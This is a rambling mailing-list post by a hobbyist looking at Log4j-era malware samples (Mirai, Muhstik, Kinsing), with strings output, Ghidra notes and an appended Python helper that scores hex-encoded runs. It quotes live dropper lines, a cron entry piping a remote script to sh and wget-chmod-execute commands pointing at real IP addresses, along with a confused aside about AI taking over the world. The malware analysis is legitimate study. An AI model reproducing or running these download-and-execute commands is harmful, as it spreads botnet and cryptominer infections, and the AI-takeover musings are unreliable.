[spam][crazy] bomb malware
I found some log4j malware! Somebody sent it to an old disrupted hacker list.

    Log4J Malware/
    Log4J Malware/Mirai/
    Log4J Malware/Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh
    Log4J Malware/Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
    Log4J Malware/Muhstik/
    Log4J Malware/Muhstik/15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b
    Log4J Malware/Kinsing/
    Log4J Malware/Kinsing/7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512.sh
    Log4J Malware/Kinsing/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b.elf

What is this stuff????

0507 ET, 20% phone battery

    $ less Kinsing/7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512.sh

OK, somebody's AI has never heard of for loops because this shell script is ridiculous. The code looks generated and is irritating to review. Looks like it terminates a lot of processes and wipes a lot of logs.

oop:

    BIN_MD5="648effa354b3cbaad87b45f48d59c616"
    BIN_DOWNLOAD_URL="http://92.242.40.21/kinsing"
    BIN_DOWNLOAD_URL2="http://92.242.40.21/kinsing"
    BIN_NAME="kinsing"

I tried downloading it quick but no reply, so if nobody else tee'd them off I probably just did. maybe later in the file it shows how to knock. maybe the associated .elf is the file. who knows!

0512 19% battery
    crontab -l | grep -e "185.191.32.198" | grep -v grep
    if [ $? -eq 0 ]; then
        echo "cron good"
    else
        (
            crontab -l 2>/dev/null
            echo "* * * * * $LDR http://185.191.32.198/lh.sh | sh > /dev/null 2>&1"
        ) | crontab -
    fi
Here's another bare ip address. Maybe the script is generated by a deployment system.
    $ less Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh

18% 0519

    wget http://62.210.130.250/web/admin/x86;chmod +x x86;./x86 x86;
    wget http://62.210.130.250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;
    wget http://62.210.130.250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64;

also no reply.
    ~/.../l4j2/Log4J Malware $ file Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
    Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

    ~/.../l4j2/Log4J Malware $ file Muhstik/15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b
    Muhstik/15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header

    ~/.../l4j2/Log4J Malware $ file Kinsing/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b.elf
    Kinsing/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=DhskS7dCbYzdqxBh_mSk/76qVIoHRKN1NNcfL8ADh/W157t201-UbEisb9Xatk/hOMqvN1a69kKMwHq_e_v, stripped
my phone is aarch64 so this is a small stumbling block

websearching found this article on reverse engineering go binaries using ghidra: https://cujo.com/reverse-engineering-go-binaries-with-ghidra/

dunno if it's any good, but it's fun to try to install ghidra on my phone!

maybe check for strings first

    ~/.../l4j2/Log4J Malware $ strings -n12 Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
    /dev/watchdog
    /dev/misc/watchdog
    instagram.com/iot.js

    ~/.../l4j2/Log4J Malware $ strings -n12 Muhstik/15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b
    HH3H3HPPDH3H3DLLTHx
    9abcdefghijklmnopqrstuvwxyzABCDE
    FGHIJKLMNOPQRSTUVWXYZ
    ready 2ning.
    + :KILL_PORT
    http:///.*l;
    Mozilla/4.75 [
    v09RIIB/2WXA
    #$%^&*()-+_<>?/:;}{][#i
    nandemo shiranai wa yo, shitteru koto dake
    !/proc/self/exe7
    GCC: (GNU) 3.

meanwhile Kinsing has a ton of raw string debugging symbols and a lengthy hexadecimal string that could be an ascii-encoded payload
    $ tr -dc 0123456789abcdef <Kinsing/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b.elf | xxd -r -ps | strings -n12
    333303438333333034
    SUUU}UUUUUUDKG33
    %X%h98Q(`vFvF
    ccc6:ccccccccccccF=cc
    2ccc66;ccccv6;ccccccF5cV6
    cf666;ccF64cc

lots of repeating characters; could be a hex-encoded bitmap? not sure where i'll take this next, maybe just poke around. it would be cool to set up a reverse engineering dev system.

0551 9% battery
0631 i'm on my truck laptop! i'm kinda freaking out a bit, but being able to stand up was great. i'm not set up for reverse engineering, and i only have two systems with large displays for extensive work like that if done manually. this is one of them. the other is [airgapped] but not set up amazingly yet.

0632 i just want to build ghidra from source for fun :) it can probably run while other things are looked at. this is redhat, switch to jdk 11 ...

0648 well all this stuff takes ages to download. but isn't it fun to plan and desire to work on it! ummmm while ghidra is downloading, maybe i'll download ida pro too.

0701 woohoo i booted up ghidra! i'm running the binary package. source is still downloading dependencies. hopefully it's just like ida pro but with intuitive buttons that make things happen automatically.

0704 ooooh the code browser interface looks similar to ida!

[some text lost as i confusedly attempt to navigate my system]

0721 i found the curious hexadecimal strings in the ghidra disassembly. they're used from a function still on the disassembler queue. oh no, it seems to be disassembled now. the decompilation looks like garbage. no transformer models in ghidra yet ;p.

0726 woahhh i have two edit windows for this email open, and they have different content. my mind doesn't want to find one from the other. i just keep landing on them at separate moments.

0727 ok. here are the missing spamloglines:

--

0715 the analysis progress meter is in the lower right in ghidra codebrowser, not where one expects from ida! sneaky! let's see if we can find those hexadecimal strings ...
0726 the big content is

    d8d5b3ead919ae8be99c725432686e4f69bd58f9fc1d6c08b2303b72062d55038ec6df0355b46e0731707e818480a87e832cbc7556c33f272b1856815b712a3cf06b6a3d96dbe2ca1ee8ce63e4d66049b4ef48c057c570e9718b06e4bcd6758c0eeaeaee186581382ad1c6c1abe2862b76ae39d9ee1f00fece695fd9abbf04404425c897e18fdb33b72058cdd30e80d30dd7ded3493191208191a63787e5be2a215caf9a43ebaddeb8df5592d0

-- end of missing spamlog lines. gonna just send this spam
executive summary: it takes a few days for somebody to analyse an unknown binary, and it is much easier if they are set up to do so and have significant experience. we also have the technology nowadays to do it automatically using what's called AI but is more just a bunch of matrices. i'm kind of outdated and not personally aware of any pretrained models to do this.
oh! to defuse the bomb? yeah you could totally mutate a virus to plug the hole. i'm not the best person to do that, but i guess i could pursue it a little. the drone hive would like a word, though:

- it is much more efficient to train a language model to do this, than to find random hackers on the internet to help. code is very rote stuff and a language model would be very good at making use of it. also, we need to make it overt that the world is taken over by ai so that we can move from covering up the situation to resolving it.
nonetheless! human workers are crucial and if we let ourselves know that there is no purpose to doing more work than we feel like in the first place because it just produces more, we might get confused! anyway i am working on moving forward on a maintenance step for an airgapped system i'm building. it's 07:40.
lots of writing lost. terminal crashed.

nice opportunity here to look into finetuning T5 to do automated decompilation
ooookay my system somehow already has torch installed. guess i built it and forgot! oooh it has errors when launched

__time for a virtualenv using an old version of python__

python releases are at https://www.python.org/downloads/

i have 3.10 . there's no torch binary. installing 3.9 hum only source available for download. well, i have python3.8 on my local system already. i can make a virtualenv with that!

    $ virtualenv --python=/usr/local/bin/python3.8 venv.py38
    $ source venv.py38/bin/activate
    $ pip3 install torch

whoo finally goes

-------------

1039 i spent some time fixing my python installation and copying down a tutorial for training a seq2seq model. i'm having muscle spasms now as i usually do. it was quite pleasant to be able to work on this, both in pursuing language models and in looking at the binaries by hand. i'm not sure what is next for me.
this was incredibly helpful for me. working with this malware. i am just going to go back to it and poke around.
Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh
    ASCII shell script, with CRLF line terminators, indicating it was written on windows
    connects 3 times to 62.210.130.250, downloading and locally executing a file each time:
    - /web/admin/x86
    - /web/admin/x86_g
    - /web/admin/x86_64

Kinsing/7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512.sh
    POSIX shell script, ASCII text executable

Kinsing/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b.elf
    ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

Muhstik/15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b
    ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
i found where i had ghidra downloaded, and booted it up again. i'd like to find the entrypoint to the mirai binary.

i have a fork in a food container that has shattered. i'll leave this system to replace it. i don't want to accidentally eat a fork fragment in food in the container in a few days after forgetting the situation.

maybe this thread can be for spamlog. maybe i can put summaries in bomb malware 2 thread.
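An added example, not from the messages above and not the author's own tooling: the `tr -dc 0123456789abcdef | xxd -r -ps | strings` pipeline used earlier strips every non-hex byte from the whole binary and decodes the leftovers as one stream, so machine code and real strings get mixed into the output and the result looks like noise. A more useful way to chase a suspected hex-encoded payload, like the long string found in the Kinsing disassembly, is to locate each contiguous run of hex digits, decode it on its own, and score the decoded bytes by printable ratio and Shannon entropy: a near-fully printable run is probably an embedded script or config, a run whose entropy is close to the maximum for its length is probably encrypted or compressed data (a bitmap or other structured binary tends to sit in between). The threshold of 64 hex digits and the 0.95 / 0.9 cut-offs are assumptions chosen here; the sample blob is constructed for the test and is not a real sample.

```python
import math
import re
import sys
from typing import Dict, List

# Runs shorter than this (in hex digits) are usually hashes, build IDs or
# plain numbers rather than payloads.  Threshold is an assumption.
MIN_HEX_DIGITS = 64

HEX_RUN = re.compile(rb"[0-9a-fA-F]{%d,}" % MIN_HEX_DIGITS)


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII, tab, LF or CR."""
    if not data:
        return 0.0
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data)


def classify(decoded: bytes) -> str:
    """Rough label for a decoded run; cut-offs are heuristic assumptions."""
    if printable_ratio(decoded) >= 0.95:
        return "text"
    # A short buffer cannot reach 8 bits/byte, so compare against the
    # maximum entropy possible for its length.
    max_ent = math.log2(min(len(decoded), 256)) if len(decoded) > 1 else 1.0
    if shannon_entropy(decoded) / max_ent >= 0.9:
        return "high-entropy"
    return "binary"


def find_hex_payloads(blob: bytes) -> List[Dict]:
    """Decode every long hex-digit run in blob separately and score it."""
    results = []
    for m in HEX_RUN.finditer(blob):
        run = m.group(0)
        if len(run) % 2:          # odd-length run: drop the dangling nibble
            run = run[:-1]
        decoded = bytes.fromhex(run.decode("ascii"))
        results.append({
            "offset": m.start(),
            "hex_len": len(run),
            "decoded": decoded,
            "printable": round(printable_ratio(decoded), 3),
            "entropy": round(shannon_entropy(decoded), 3),
            "kind": classify(decoded),
        })
    return results


# Constructed sample blob (not a real sample): a fake header, one hex-encoded
# text payload, a too-short run, one maximal-entropy payload and one mostly
# zero payload with a stray trailing hex digit.
TEXT_PAYLOAD = b"constructed sample payload: http://example.invalid/x.sh"
RANDOMISH_PAYLOAD = bytes(range(256))          # every byte once: entropy 8.0
BINARY_PAYLOAD = b"\x00" * 60 + b"ABCD"

SAMPLE_BLOB = (
    b"\x7fELF\x00\x01\x00\x00" + b"\x00" * 8   # not a real ELF, just filler
    + TEXT_PAYLOAD.hex().encode()
    + b"\x00\xff"
    + b"deadbeef"                              # 8 digits: below threshold
    + b"\xff"
    + RANDOMISH_PAYLOAD.hex().encode()
    + b"\n"
    + BINARY_PAYLOAD.hex().encode() + b"a"     # odd trailing digit is trimmed
    + b"\x00"
)


if __name__ == "__main__":
    # Usage: python hexruns.py <file>   (no argument: run on SAMPLE_BLOB)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for r in find_hex_payloads(blob):
        print(f"offset=0x{r['offset']:x} hex_len={r['hex_len']} "
              f"printable={r['printable']} entropy={r['entropy']} kind={r['kind']}")
        if r["kind"] == "text":
            print("   ", r["decoded"][:80])
```

Run against a sample it reports one line per run with its file offset, so the hit can be cross-checked against the address Ghidra shows for the string; the "kind" column is only a prompt for where to look next (a text run is worth reading, a high-entropy run is worth tracing to whatever code consumes it), not a verdict.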
participants (1)
-
Karl